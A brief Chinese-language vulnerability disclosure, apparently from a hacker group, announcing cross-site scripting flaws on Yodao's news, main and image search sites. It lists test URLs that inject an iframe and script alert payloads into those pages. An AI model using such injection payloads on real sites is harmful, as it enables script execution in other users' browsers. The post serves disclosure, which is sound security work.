有道(yodao.com)跨站漏洞(首发)
发现人:Hack_HT(后天技术联盟——A.T.U)
WEB
http://hackht.uu1001.com/
测试代码:
http://news.yodao.com/search?q=<iframe%20src=http://www.baidu.com/%20width=1000%20height=200></iframe>&keyfrom=web.top
http://news.yodao.com/<script>alert("hackht.uu1001.com")</script>
http://www.yodao.com/<script>alert("hackht.uu1001.com")</script>
http://image.yodao.com/<script>alert("hackht.uu1001.com")</script>
截图:
